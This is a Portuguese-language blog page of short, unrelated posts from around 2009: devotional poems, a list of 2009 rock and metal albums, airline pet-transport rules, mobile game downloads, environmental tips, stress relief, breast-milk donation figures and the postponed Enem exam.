Poesias EvangélicasLouvar ao Senhor Deus é um ato que não exige de nós nada além de muito amor no coração, e nada melhor para demonstrar todo amor que sentimos pelo nosso Pai do que dedicar a ele uma poesia, escrita com palavras doces, tão doces quanto sua bondade para com todos aqueles que nele têm fé, mas se você não sabe declarar seu amor por Deus com suas palavras, leia a poesia abaixo, com certeza ela também descreve seus sentimnetos.

E não existem dúvidas de que os melhores poetas do Senhor estão entre os evangélicos, pois a inspiração de Jesus e do próprio Deus dá a eles a força e o amor necessário para conseguir escrever palavras tão sábia, que combinadas belamente são muito mais do que um pedido, são um sinal de adoração total e eterna ao Nosso Senhor todo poderoso. Escolhemos poesias para que você sinta em seu coração a mão do Senhor te ajudando. Se você quiser mais poesias em louvor a Deus, acesse o site Recanto das letres e busque por poesias evangélicas, lá estão poesias lindas, que nos ajudam a buscar e a sentir Deus mais perto de nós.

Perdoa-me meu Deus,
Senhor sei que sou falho, frágil pecador,
Mas ouve-me meu senhor,
Perdoa-me meu Deus,

Por que meus erros, eu já não posso suportar,
Os velhos erros,
Do viver errado que eu levo,

Ouve o meu clamor,
Perdoa meus erros,
E livra-me senhor,
Habita em mim,
Hoje e para sempre!

Por que a ti eu recorri quando precisei,
E teu amor me atendeu,
A sua mão forte me alcançou,
E hoje meu Deus,
A partir de hoje,
Eu quero viver apenas por ti!

Poesias católicas

Poesias católicasSe existe uma forma de louvar a Deus, seus anjos e santos que é simplesmente completa e sublime é a poesia. Ainda mais com uma inspiração tão maravilhosa quanto a palavra de Deus, sua bondade e tudo aquilo de bom que ele nos oferece em nossas vidas. Se você é católico, vai adorar as poesias que escolhemos para que você declare todo seu amor, ao nosso Senhor, sua orla de santos e anjos, que nos protegem todos os dias.

Escolhemos aqui uma poesia feita com muito amor e carinho para celebrar toda nossa adoração por Nossa Senhora, mãe de Deus e nossa mãe, que sempre está ao nosso lado, nos dando força e nos mostrando que o lado do amor e da compaixão é o melhor que existe. Adorar Nossa Senhora é algo sublime, que nos eleva aos céus, pois afinal, Ela é quem intercede nossas orações e pedidos, sempre olhando por nós e nos protegendo.

Poesia para Nossa Senhora
Bendito o fruto é o seu ventre!
Que nele gerou um salvador!
Mãe de todos nós!
Com o seu manto sagrado
Com asas de um anjo!
Mãe de grande ternura
Que sofreu ao ver seu filho na cruz
Nossa Senhora
Nossa mãe imaculada
De divina bondade!
Olhamos nossa mãe terrena
E o que vemos?
Vemos um pouco de Nossa Senhora:
Seu carinho, Seu Amor, Sua proteção
E um calor especial que todas as mãezinhas tem!
Poderia falar-lhes várias belas palavras
Sobre esta eterna mãe misericordiosa
Mas somente direi uma que
me preenche todo o coração:
Ela é a nossa mãe
Mãe de sublime amor!

Melhores álbuns de 2009

Melhores álbuns de 2009Quem é fissurado por músicas sabe que nem sempre um ano pode ser produtivo para esse canto tão rico na cultura mundial, muitas vezes preferimos listas de anos já passados e muitos dos melhores discos e músicas, ouvidos em todo o planeta até hoje tem mais de vinte anos de idade, mas é claro que no meio de muita coisa ruim que é lançada por gravadoras nacionais e internacionais, sempre tem muito material de qualidade, que vale a pena ser ouvido.

Neste ano por exemplo temos grandes bandas que nos mostram que o bom som não morreu, e muito mais, está muito longe de acabar, afinal, o que é bom sempre sobrevive! Bandas como AC/DC voltaram contudo, com seu Hard Rock que faz o coração pular, outros monstros da cena musical mundial como Kreator também estão com discos recém saídos das gravadoras. Uma banda nacional que lançou um álbum neste ano foi o Sepultura, a novidade é que é o primeiro disco depois da saída de Igor Cavalera, agora a bateria é comandada por Jean Dolabella.

O cenário para quem curte um bom Rock N’ Roll ou Metal, seja qual for sua vertente foi muito rico neste ano, pra quem curte uma Death Metal com qualidade extrema, o cd lançado neste ano pela banda sueca Arch Enemy também é um grande disco. Confira agora uma lista contendo os melhores álbuns lançados neste ano:

Arch Enemy - Manifesto of Arch Enemy
Kreator - Hordes of Chaos
AC/DC – Black Ice
Sepultura – A-Lex
Soul of Dannation – Blood Red Thone
Cannibal Corpse – Evisceration Plague
Slayer – World Painted Blood

Normas das companhias aéreas para transportar animais

Normas das companhias aéreas para transportar animaisQuem tem um animalzinho de estimação sabe o quanto é importante pra nós que eles estejam sempre bem, e quando vamos viajar, deixa-los em casa pode atrapalhar muito a viagem, pois afinal, fica difícil resolver problemas ou então curtir as férias sem saber o que pode estar acontecendo com nosso animalzinho, que pra muita gente não é apenas um bichinho, mas sim um membro da família.

Caso você vá fazer uma viajem de férias, já pensou em levar consigo seu gatinho ou cachorrinho? Caso você já tenha pensado nisso, mas ainda não sabe como deve fazer, e quais as companhias aéreas que aceitam e fazem esse transporte, confira uma lista com valores de transporte e limite de peso para que você possa levar seu bebê pet sem problemas e curtir uma viagem maravilhosa.

Tam: Para o animal viajar na cabine, o peso total não deve ultrapassar 10kg, animais maiores são despachados, e não são aceitos aninais viajando na primeira classe, a companhia não se responsabiliza por eventuais problemas que o animal possa ter durante o vôo, a taxa varia entre R$90 a US$50.

American Air Lines: para ir na cabine, a gaiola do animal deve ter no máximo 58x33x22cm², a taxa é de US$100 a US$150, limite de apenas 7 animais por vôo, e se acontecer algo com o animal, um inquérito é aberto para apurar as responsabilidades.

Gol: animais só viajam no compartimento de bagagens, e não podem pesar mais do que 30kg, não se responsabilizam por eventualidades, a taxa é de R$70, e o limite de apenas 2 animais por vôo.

Downloads de games para celular

Downloads de games para celular Pra quem está sempre antenado nas novidades da tecnologia, o celular é um item praticamente existencial, não só pela função telefone que ele possui, mas também pelo fato de que os celulares de hoje em dia são na verdade pequenos computadores, com todo o tipo de função possível, com acessos a internet, câmera, TV enfim, todo o tipo de coisa.

E se o seu celular é um desse super modernos que têm a possibilidade de baixar aplicativos e jogos, existem muitos sites que podem te ajudar ainda mais a utilizar todos os recursos que esses aparelhos podem te oferecer. Sites como por exemplo o Zoonado celular.com , possui uma lista enorme de todos os tipos de games, que vão desde os mais simples e comuns, como por exemplo vários tipos e varia coes de Tetris, até games de estratégias mais legais do momento, games como War, Sinuca e do Sonic estão disponíveis, gratuitamente, o que é a melhor parte.

É muito simples, basta entrar no site, escolher o game que mais te interessou e depois escolher a forma de download. No site existem três formas para baixar os jogos escolhidos, a primeira é baixar no PC, e depois com o USB você passa no celular, a segunda maneira é baixar no celular, você digita seu DDD e número e segue as instruções, e a terceira forma é baixar direto no Telemóvel, basta clicar e seguir as instruções. Além de games, o site disponibiliza também músicas, papéis de parede e toques para seu celular.

Meio Ambiente e degradação


Meio Ambiente. Atualmente, é um dos temas em destaque em todo o mundo.

Muitos cientistas preveem mudanças radicais com recursos naturais, ativistas tomam frente e promovem ações para informar e protestar atividades que destruam nosso habitat, etc.

Seguem aqui, algumas formas para ajudar na sustentabilidade do planeta:

Diminua o consumo de água (A quantidade existente nunca se alterou e nem se alterará, embora muitos pensem que este recurso seja infinito)

Recicle todo o lixo doméstico (Não é necessária a separação por: orgânico, papel, vidro e plástico. Para facilitar, separe apenas reciclável e não reciclável o que já ajuda bastante.)

Plante mudas em casa ou em torno de seu bairro.

Limite o uso de energia ou troque por meios mais adequados como: a eólica, solar, hidrelétrica, etc.

Busque locomover-se com transporte público, bicicleta ou até mesmo a pé. (Pois automóveis liberam o CO2-dióxido de carbono, que se concentram na

Você já gritou hoje?


Aquele som tão irritante, que com toda a certeza perturba a todos que estão ao redor do percussor deste, pode ser uma fonte de alivio, mas isso não é nenhuma novidade, pois, toda forma de chamar a atenção geralmente é uma forma de aliviar o estresse e qualquer outro problema.

Quando gritamos estamos liberando adrenalina o que causa um alivio imediato e lhe faz se sentir bem, é como dar um murro na parede para aliviar a tensão ou parar por 10 segundos e respirar para se acalmar, um grito pode evitar uma briga ou uma ofensa. Ele pode realmente pode lhe ajudar.

Esta é  somente mais uma forma de se expressar sem magoar os outros e se por no lugar, mas é valido lembrar que devemos gritar para nós e não com os outros, para não gerar novos problemas, grite sem medo e sem medida, grite que se sentira melhor, mais grite sem ofender e criar situações constrangedoras. Se expresse.

Doadoras de leite, mais solidárias.




Uma simples atitude para muitos e sacrifício árduo para outras. O leite materno pode vir em abundancia para algumas mães e em escassez para as outras, doar é uma atitude que pode salvar muitas vivas, e em especial, são vivas recém-chegadas ao mundo que já nascem colhendo o fruto bom da solidariedade. 

O numero de doadoras de leite subiu 83% em cinco anos segundo o Ministério da saúde, são 196 bancos de leite e 73 postos de coleta que atendem atualmente está em torno de 110.648 mulheres doadoras dessa preciosidade, este ano a atriz Samara Felippo aderiu a campanha, sendo a atual madrinha. 
 

O leite materno pode reduzir em 13% a mortalidade infantil entre crianças menores de 5 anos de idade, procure um posto de coleta e você, mãe, faça também a sua parte, doar um pouco de si não faz mal a ninguém e nunca se sabe realmente se nós não precisaremos também. 
 

Por o Enem 2009 foi adiado


O Exame Nacional do Ensino Médio, que seria realizado nos dias 03 e 04 de outubro, foi cancelado nesta ultima quinta-feira, dia 1º de outubro, pelo Ministério da Educação e Cultura (MEC) dada uma decisão do ministro Fernando Haddad, após ter o conhecimento de uma denúncia.  

O jornal “O Estado de São Paulo”, informara que as provas teriam vazado e que um homem havia procurado o jornal oferecendo-as por 500 mil reais. Este ato fora considerado pelo ministro como criminoso, mas ainda assim dispensará um pedido para a Força Nacional de Segurança participar da logística do exame. 

A nova data do Enem será divulgada no dia 7 de outubro, e acredita-se que será realizada dentro de 45 dias, sem descartar a hipótese de ser em um dia da semana podendo o ministro declarar um feriado estudantil. A nova prova já está pronta e se encontra protegida no um cofre do Instituto Nacional de Estudos e Pesquisas Educacionais (Inep). 

Related Posts Plugin for WordPress, Blogger...